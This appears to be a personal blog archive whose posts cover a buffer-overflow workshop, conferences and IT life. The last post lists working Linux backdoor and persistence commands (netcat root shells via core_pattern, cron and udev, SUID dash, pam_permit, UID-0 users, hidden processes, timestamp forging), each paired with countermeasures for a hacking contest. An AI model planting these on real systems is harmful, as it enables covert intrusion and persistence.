BufferOverflow Workshop at EasterHegg09

During Easterhegg I held a workshop together with hc. It was about Buffer Overflows, which used to be the most common security vulnerability a couple of years ago.

We gave a talk explaining the basic concepts of processes and how they work on x86 machines. This was heavily packed with information and I really think we couldn’t make everything clear in the first run. But as it was planned as workshop, we intended to give people stuff they can chew on 😉 Basically, we took stuff from the excellent Phrack article  Smashing the Stack for Fun and Profit which is nearly 13 years old by now.

As modern operating systems protect themselves against the consequences of buffer overflows, we prepared a virtual machine with QEmu/KVM so that exploits will work. It’s an old debian woody with an SSH daemon and build essentials.

Of course I have changed the image in the last minutes, because I wanted to improve it. And of course something went terribly wrong: The root filesystem was corrupted and fsck deleted important files, leaving the image in a useless state. We had to port my changes back to the old image.

Of course, we wanted to distribute the ~1GB image among our workshop guests. As we expected 50 people to show up and didn’t want to stress the WiFi so much, I intended to use BitTorrent, but it’s not as easy and smart as it could be: We are NATted, so using an external tracker would FAIL. Also, it can’t multicast the packets, which would perfectly make sense if many people start to download the torrent in the same network. We ended up having a usb pendrive and a thttpd serving the tarred image. Not very smart or efficient.

After the people ran that images, they couldn’t login with SSH due to a mysterious heisenbug. I suspect our last-minutes changes to be the culprit but I can’t provide a more technical error description. The SSH daemon worked quite well *in* the image, but as soon as you wanted QEmu to redirect the traffic into the machine, it FAILed: The connection was established, but no data was transferred. Could be a bug in QEmu as well.
The people either worked through the QEmu widget or set up a TUN device to get the network up and running…
That pissed some people off which then left. We ended up with 20 people trying to hack themselves 🙂

We prepared examples in the image, some of them copied from Gera, e.g.:

/* stack1.c                                     *
 * specially crafted to feed your brain by gera */

int main() {
	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08xn", &buf, &cookie);
	gets(buf);

	if (cookie == 0x41424344)
		printf("you win!n");
}

The people were supposed to make the program print “you win!”. If you know, how a stack works, it’s actually simple. Do you know, what input you have to feed in order to win!?
Oh, you don’t want to compile this program with anything other than -O0 because the compiler rearranges the variables on the stack so that you can’t overwrite the integer…

In the end, I think I am satisifed with the workshop, although things could have worked better. We had pretty smart people which were really curious how stuff works. They have learned a lot and I guess they had fun with that as well 🙂

Wilhelm.Tel Speed

After ranting about the HanseNet Speed, I now have the opponents test result:Wilhelm.Tel Benchmark

I didn’t expect 100MBit/s down, because I still have my old router in place which most likely isn’t able to push 100MBit/s. I’ll definitely give it a new try once I am “directly” connected, i.e. without any unnecessary hardware in between.

Taking the IELTS

As I said some time ago, I had to do an IELTS test in order to apply at the DCU. I do already have kind of a language test which I made for the DAAD, but it’s not good enough for the DCU… So I bit the bullet and paid the Euros to take the IELTS.

I decided to go for IELTS, instead for the TOEFL, because I was told that it’s friendlier and even more comfortable to do. The TOEFL seems to be a computer based test which can be very annoying.

The IELTS was held in a friendly but formal atmosphere. Everything, and I mean everything, had a rule you and the supervisors had to stick to. I wasn’t even allowed to take my keys inside the examination room.  Not to mention my wallet.

The test itself went pretty well, especially the listening and reading part. I didn’t manage to perform equally well on the writing part. These tests took a couple of hours and I was pretty happy to get some fresh air afterwards. I had three hours sparetime before the speaking test should begin. Actually, I was really nervous. I don’t know why, because there was nothing I should be afraid of. I mean, even if I failed pretty hard, I always could redo the test. At least, I managed to speak and the results are not that bad.

So I a better result than I actually needed 🙂 One step closer to my application at the DCU.

any2ogg/Theora+Vorbis

My University decided to publish some videos using an DivX Codec. These videos are part of some Software Engineering class and serves as a replacement for real customer interaction.

Anyway, I decided to transcode those videos using a free codec and I boldly announced, that I’ll do that without actually knowing how much work that’d be. In fact, I feared kilobytes of arguments to mencoder or ffmpeg. I also didn’t want to use new and awesome stuff like Transmageddon or Arista, because I wanted a really simple solution, like any2wav. I imagined something like any2theora which simply does what I want.

It turns out, that ffmpeg2theora exists and it does exactly what I want. It is really simple to use, no command line argument whatsoever to produce a well working Theora encoded video with Vorbis encoded sound.

Yay!

Gran Canaria Desktop Summit

The GCDS has just finished and I think it was a great and successful conference. It was the first joint aKademy + GUADEC conference and I feel it turned out quite well. We could have had more explicit collaboration or more attention on the “other” talks, but I think the people have to get used to the fact that there are people with different approaches who you can talk to. Let’s hope it’ll be a joint convention next year as well (I always wanted to spend a week or two in Finland…).

The registration process was a bit weird, because the organizers wanted to know private data without even trying to make clear what they are used for. In fact, the only thing I could see (even from a retro perspective) is to collect the data. As I’ve stated in a mail buried in this thread, I don’t really like that for several reasons and I hope that the next organization committee will not collect absolutely necessary data.

The first day began with a RMS keynote for me. I expected it to be really bad because for some reason the people say that RMS’ talks are boring, stubborn and repetitive. I’ve never heard a RMS talk before and I couldn’t apply any of these critics onto his talk. In fact, I really liked and enjoyed it, although it was not necessarily pleasant to listen because he disagrees with our decisions: He doesn’t like to see new applications to be written in C# because the Software Freedom Law Center doesn’t think that the Community Promise guarantees that Microsoft will not charge patent fees. I am not into that topic but I believe that the SFLC does a good job. And I also trust the SFLC more than I trust Microsoft. So it’s not about patents in general (which should be abolished anyway) but rather about not putting too many weight onto our Desktop so that we can get rid of C# apps easily in case of fire^W ugly patent stuff. And I don’t know what’s not clear about that: As the risk seems to be there and we want to have a free desktop in the future, we have to watch out now to not fall into a Bitkeeper trap.

I also don’t agree with travis or lefty who think the reference to an EMACS virgin is sexist or mixing different topics (software freedom and religion in this case) is unhealthy. RMS clearly referred to the Christian church and it’s habits, so if there is anything bad, it’s to be search in these circles. Also, virtually everyone has cheered after RMS’ performance. And I wouldn’t go that far and call all the audience sexist. Actually, I dislike the idea of (computer) engineers answering sociologists questions for the same reason I don’t ask a sociologist in case of computer trouble (I like it, when they think, talk and discuss about it though). From an intersectional point of view, I’d ask whether the strong focus on women is actually sexist, because there is clearly more than one domain we have minorities in. Take Blacks, Jews, Disabled or Queers or people with an inside out belly button for example. By constantly reciting that women are a minority, we could actually harden this situation instead of making it disappear. I could actually write a paper about it, as I need one for university anyway to finish my Gender Studies.

The parties were all awesome, thanks to Canonical, Nokia, Igalia and Collabora who really know how to throw a good party. I wonder why Google didn’t show up though.

I also have to thank the GNOME foundation for sponsoring my trip to Gran Canaria! It’s really good to see that my contributions are valued and that I can improve them by attending various talks and sessions. This year was especially useful because we could attend the KDE peoples sessions. I especially enjoyed being at the KDE bugsquad sessions to share and improve ideas.
Sponsored by GNOME!

Although I took some photos, I won’t upload them to flicker, but the people seem to tag their photos with “gcds” or “guadec”. I have looked through a couple of them and they seem to be all good. But I couldn’t make it through all of them as there are way too many.

Two major drawbacks were the relocation of the conference and the Internet connectivity during the event: We moved from the rather central Alfredo Kraus Auditorium to the suburban University on the fourth day or so. That was inconvenient because it took ages to get there. The Internet thing is totally unrelated to the organizers, but left a bad taste anyway. The uplink was totally broken with a packet loss with up to 75% in “So6-0-0-0-grtmadno1.red.telefonica-wholesale.net”.

I’m looking forward to next years GUADEC or maybe “TDS”… 🙂

Bugsquadding Talk on GCDS

I just had my talk with Pedro and I think it went quite well.

We talked about how to do QA in GNOME and how to use our tools properly. There were about 30 people listening and discussing with us. It was a great honour to meet the bugsquad heros like Philip, Akhil and guenther. Thanks to Andre to look over our slides.

Besides telling about our infrastructure, we slightly discussed alternative ways to access our bug database: There seems to be DeskZilla and Mylyn to work with bugzilla through the XML-RPC API. I haven’t tried Deskzilla yet (the GNOME key link is broken atm), but Cosimo says it doesn’t work with the GNOME bugzilla probably because it’s heavily patched. I wonder when we’ll migrate to Bugzilla-3…
I tried Mylin but it unfortunately doesn’t work either 🙁 You can query and show the bugs but you can’t update them. It’s a pity because I think that webinterfaces suck in general and our GNOME bugzilla in special.

Although the intended target group wasn’t there, we managed to recruit triagers 🙂 Let’s hope they’ll stay with us for a while. You can find the bugsquad-slides.

I followed the KDE Bugsquad BoF and we discussed several things. They seem to have more fundamental problems than we do, especially getting the bugzilla used by the developers. I collected a couple of ideas: Given that you can’t edit bugs right away if you just have created an account, would it be good to automatically set editing right once a user has commit permissions on the VCS? What about a bugsquad (micro) blog to keep the community informed and involved? It could be a good idea to have kind of a monthly digest which will be sent around. I also envy the KDE Bugdays which apparently are a lot of work, but also potentially recruits new bug triagers. Maybe one could write an webapp for managing the work involved…

mrmcd0x8 – Call for Participation

Die MetaRheinMain ChaosDays gehen in eine neue Runde *yay*! Ich werd’ wohl dieses Jahr nicht koennen, aber ich war ja nun auch schon oft genug dort 😉 Wenn du einen Vortrag oder einen Workshop einreichen willst, benutze bitte das Pentabarf. Ein Grund, etwas einzureichen (oder um einfach nur hinzugehen) ist das Pornophonique Konzert! Wirklich empfehlenswert.

c&p von der offiziellen Seite:

Der CCCMZ, C3F2M, CCC Mannheim, oqlt, der IT Stammtisch Darmstadt und CDA laden zu den achten MetaRheinMain ChaosDays ein.

Die MetaRheinMain Chaosdays 0x8 sind ein jährlich stattfindender Kongress, der dieses Jahr unter dem Motto “Zurueck zum Thema” mit den Themenschwerpunkten Journalismus, Gesellschaft und Technik vom c3f2m Frankfurt, CCCmz (Mainz/Wiesbaden), der Hochschulgruppe Chaos Darmstadt, dem AK Vorrat und weiteren regionalen Gruppen im Rhein-Main-Neckargebiet organisiert wird. Die MRMCDs finden dieses Jahr vom 04.09-06.09.2009 an der Technischen Universität Darmstadt statt. Drei Tage lang werden Vorträge, Diskussionen und ein Hackcenter geboten.

Die Vorträge und Workshops richten sich mit Themen sowohl an die breite Öffentlichkeit, als auch an spezialisierte Interessen. Auf diese Weise soll die wissenschaftliche Anbindung und der Bezug zum aktuellen öffentlichen Diskurs gewahrt werden. Folgende Schwerpunkte bilden das Rückgrat der Veranstaltung:

  • Journalismus
  • Gesellschaft
  • Technik

Darunter fallen z. B.: Wahlmaschinen, Überwachung, Kryptographie, IT-Sicherheit, Biometrie, Vorratsdatenspeicherung, BKA-Gesetz, Elektronische Gesundheitskarte, Auswirkung der Weiterentwicklung von Technik auf die Gesellschaft, Chaos Kultur, Projekt- und Selbstmanagement.

16th DFN CERT Workshop 2009

Again, I had the great pleasure to attend the annual DFN Workshop which takes place in the Conference Center Hamburg (ever thought about, why they haven’t called it “Konferenz Zentrum”?).

dfn-cert logo

It’s more “tieish” than a Chaos Communication Congress but it’s still comfortable being there. Most people have a strong academic background so they were used to jeans and pullovers as well 😉

The first person to speak was a Dr. Neil Long from Team Camry and he spoke about the underground economy. They claim to research and investigate in that area and make deals with the criminals. He showed IRC logs most of the time and it was quite funny to see how the people interact with each other. They actually do speak 1337 and even I had a tough time reading their conversation 😉 He explained in great detail how the underground is organized. He claimed, that there are specialists for everything, everywhere. Programmers, Exploit-writers, Webhosts, Credit Card stealers, yadda yadda. Everything has it’s price and that is paid through various online money trasferring systems.

The next guy talked about Exploit Toolkits for the Web. He named various kits, like MPack, IcePack, NeoSploit, FirePack or UniquePack. They basically allow you to create a drive-by download site and deploy a given payload. The programs itself are split up into two parts. A server part which actually exploits a browser and makes it download and execute a loader program which in turn downloads the second stage – the real malware to be run on the victims machine. The other part is a binary to create that first-stage program. I spent some time in searching for those toolkits and downloaded some of them. That required me to learn some Russian 😉
This first-stage part opens an interesting attack vector to the wannabe hackers: Many Web Exploit Toolkits were infected with malware themselves. Because you have to run a strange smelling binary to create your first-stage excutable, you might run foreign malware yourself. I actually don’t understand, why this loader thing is such a big issue. I assume you could deploy your malware in first place without having it loaded through a staging program.

The next interesting talk was given by the smart guys from Red Team Pentesting, which is a pretty interesting company actually. Former students founded that company and they do professional Pentesting. I have to admit, that I envy them a little. It must be a great job with a lot of interesting stuff to see. Anyay, they talked about jBoss insecurities. It seems that jBoss comes with development configuration and the people don’t change them to productive values but blindly bind their server to the network. It turns out that you can get shell access through nearly a handful ways, even if a smart administrator has locked some ways down. Also, many corporate or governmental site are driven by a jBoss server and -which is the interesting part- have a weak configuration. They have an interesting statistic that shows that only 8% of the JBoss servers out there are reasonably secure.

How secure is the JBoss Web?
How secure is the JBoss Web?

I was actually bored by just one talk. It was about GRID Firewalls. While the topic is interesting in general, the guy made me fall asleep :- That’s a pity, because I believe he knew what he was talking about and had valuable information to deliver, especially due to his strong emphasis on practical problems. Maybe he can get his talk accepted next year and improve his talking skills.

After the first day, we visited the Groeninger Braukeller which was a real blast! They have one of the finest beers I know of. Also the food in there is delicious. It’s a perfect atmosphere to get together and discuss the talks you’ve just listened to. I also took the chance to meet old friends which I haven’t seen for a while.

Probably due to the massive amount of food and beer, I couldn’t sleep well that night and I thus was very tired the second day. I’ve listened to the talks but I couldn’t make it to the ModSecurity workshop 🙁 It’s really annoying, because I actually wanted to attend that session! I do use ModSecurity at some projects and I think it’s a good tool. A reallife-relevant workshop would have been great.

So, if you have nothing else to do on 2009-02-09, consider coming to Hamburg and enjoy the 17th DFN Workshop!

g0t r00t? pwning a machine

Imagine you have root access to a machine for, say, 15 minutes. Or better: Imaging you have accidentally left your machine unattended for about 900 seconds and once you’re back, you’re wondering, what an attacker could have done.

I’ll explain a few simple and quick attacks which will have a rather high impact. The main motivation came from the Hacking Contest at the LinuxTag in Berlin. It’s rules in short are: Have your laptop backdoored in 15 minutes by the opponent team while you backdoor theirs, clean your computer in 15 minutes and exploit the opponents laptop in the following 15 minutes.

core pattern

You can give the kernel a crash handler which will be executed if a segfault happens. Ubuntu uses that to launch apport and you can hijack this feature to have your rootshell executed:

   echo '|/bin/nc.traditional -l -p 31337 -e /bin/sh' | sudo tee /proc/sys/kernel/core_pattern
   gedit & kill -SEGV %%

You see, it’s pretty simple, quick to install and it’s powerful as well. You can now connect to localhost 31337 to have a rootshell. Of course you could launch connect back shells or any other malicious program.

To counter this threat, you might want to read this core_pattern file or in doubt erase the signal handler:

  echo '' | sudo tee /proc/sys/kernel/core_pattern

cronjobs

You know cronjobs, don’t you? But do you know the cronjobs of the “games” or “mysql” user? And have you checked your /etc/cron.*/? You better do 😉 Because installing malicious scripts there is pretty simple:

  for u in root games mysql; do sudo crontab -e -u $u; done
  5 * * * * /bin/nc.traditional -l -p 31337 -e /bin/sh

You might want to copy a file with the above mention cron string to  /etc/cron.hourly/ and /etc/cron.d/.

If you are a smart attacker, you have multiple lines containing the same job, especially one line after 1000 newlines, so that the admin has to scroll years to find it…

To counter this, check your cronjobs: sudo ls -l /var/spool/cron/crontabs/ /etc/cron.*/

dash backdoor

If you run a program which has the SUID bit set, then you have the rights of the user owning that file. That can be useful for ping or passwd, but probably isn’t for a shell. That’s why you can’t set the SUID bit on the bash. The “dash”, however, allows that 🙂

  sudo cp /bin/dash /bin/ping4 && sudo chmod u+s /bin/ping4

To find SUID binaries: find / ( -perm -4000 -o -perm -2000 ) -type f -exec ls -la {} ;

You’ll get a rootshell by simply executing ping4.

hide processes (with listening sockets) from ps and lsof

mkdir /tmp/empty
/bin/nc.traditional -l -p 31337 -e /bin/sh &
ps aux | grep $!
sudo mount --bind /tmp/empty /proc/$!
ps aux | grep $!

Countermeasure: netstat -tulpe and checking cat /proc/$$/mountinfo for suspicious mounts over /proc/.

udev exploit device

The idea is to plug an exploit device into that machine and have a rootshell.

I plugged a usb mouse into the laptop, viewed dmesg or udevadm monitor to find the devices ID, which then can be used with udevadm info --path:

  udevadm info --attribute-walk --path=/devices/pci0000:00/0000:00:1d.0/usb5/5-1/5-1:1.0/input/input18

That’ll produce udev attributes which can be used to write rules, e.g.

  SUBSYSTEM=="input", RUN+="/bin/nc.traditional -l -p 31337 -e /bin/sh"

You want to hide that /etc/udev/rules.d or better /lib/udev/rules.d/.

To counter this threat, you have no choice besides:

  grep -rn RUN /etc/udev/rules.d/ /lib/udev/rules.d/

which is unfortunately not that easy.

PAM deauthentify

Most of the time, PAM is the central place for all services to authenticate a user. While configuring PAM is not the most exciting thing I know, you can exploit it without actually know anything about the modules or the syntax.

Simply replace  pam_deny with pam_permit in /etc/pam.d/common-auth:

"auth   requisite           pam_permit.so"

To counter modified PAM rules, there’s nothing you can do besides reading your rules 🙁 If you go down this rabbit hole, bring a flashlight.

A better hack would be to replace the deny module with the permit module! cd /lib/security; ln -f pam_permit.so pam_deny.so

If it’s hardlinked like about, you can find these with

find . -links +1

if it’s copied, instead of hardlinked, you have to compare file hashes or better reinstall libpam-modules.

rewrite sshd config

Public key authentication is very convenient, because you don’t have to remember passwords. Also you can you hijack accounts easily if you add your public key to the files with authorized keys 😉

cat ~/.ssh/id_rsa.pub | sudo tee /root/.wgetrc
cp /etc/ssh/sshd_config /tmp/
Put AuthorizedKeysFile %h/.wgetrc in /etc/ssh/sshd_config
Put Banner /etc/issue.net in /etc/ssh/sshd_config
sudo /etc/init.d/ssh reload
mv /tmp/sshd_config /etc/ssh/
cat ~/.ssh/id_rsa | sudo tee /etc/issue.net

This probably needs some explanation.We first copy the public key into an innocent looking file, then save the original SSHd configuration, before we edit it and put those configuration strings in it. By reloading the SSHd it’ll recognize the new configuration and we then mv the original config back! That way, the admin doesn’t see anything suspicious but the SSHd will run with your configuration! *yay*. In order to use the stored private key, we’ll blow it out to the world by putting it into the SSHd banner 😉

To counter this, either patch your sshd that it’ll immediately reload once the configuration file has been change using inotify (udev does that) or review your SSHd config and reload it even if you haven’t changed anything!

New Users with UID 0

For some reason, it is not important that a user is named “root”, but that it’s uid is 0. So if you create a user with the uid 0, you’ll have root privileges 🙂 Multiple users with the same uid but different name isn’t harmful. So combining this with the 1000 scrolllines trick mentioned above, you have to do something like this:

echo 'hackr:x:0:0:hackr,,,:/home/hackr:/bin/bash' | sudo tee -a /etc/passwd
printf %sn%s hackr hackr | sudo passwd hackr

add 1000 lines to the passwd file and do the things above again.

To counter, grep ':0:' /etc/passwd

Vino

GNOME ships a VNC Server which can be activated with vino-preferences. Or for the lazy people:

gconftool-2 --set /desktop/gnome/remote_access/enabled --type bool true
gconftool-2 --set /desktop/gnome/remote_access/prompt_enabled --type bool false
gconftool-2 --set /desktop/gnome/remote_access/view_only --type bool false

Timestamps

If you want to find files which have been recently modified, you can used “find”:

To find last modified files:

  find -mtime -1 /

Or recently created files

  find -ctime -1 /

If you have a reference file:

  find -newer /path/to/file

To hide your changes to a file, you can use “find” with “touch” to either simply touch the files to give them the current timestamp, or give them a the timestamp of a reference file:

  find /tmp/ -exec touch --reference=/path/to/file '{}' ;
Creative Commons Attribution-ShareAlike 3.0 Unported
This work by Muelli is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported.